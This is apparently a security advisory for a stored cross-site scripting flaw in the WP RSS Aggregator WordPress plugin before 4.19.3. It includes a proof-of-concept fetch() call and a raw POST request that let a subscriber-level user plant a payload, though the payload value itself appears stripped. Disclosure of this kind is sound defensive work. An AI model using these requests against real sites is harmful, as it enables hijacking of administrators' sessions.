WP RSS Aggregator < 4.19.3 - Subscriber+ Stored Cross-Site Scripting

The plugin does not sanitise and escape data before outputting it in the System Info admin dashboard, which could lead to a Stored XSS issue due to the wprss_dismiss_addon_notice AJAX action missing authorisation and CSRF checks, allowing any authenticated users, such as subscriber to call it and set a malicious payload in the addon parameter.

PoC

fetch(“https://example.com/wp-admin/admin-ajax.php?action=wprss_dismiss_addon_notice”, { “headers”: { “content-type”: “application/x-www-form-urlencoded” }, “body”: “addon=&notice;=b”, “method”: “POST”, “credentials”: “include” }); POST /wp-admin/admin-ajax.php?action=wprss_dismiss_addon_notice HTTP/1.1 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate content-type: application/x-www-form-urlencoded Content-Length: 56 Connection: close Cookie: [any authenticated user] addon=&notice;=b The XSS will be trigger at https://example.com/wp-admin/admin.php?page=wpra_tools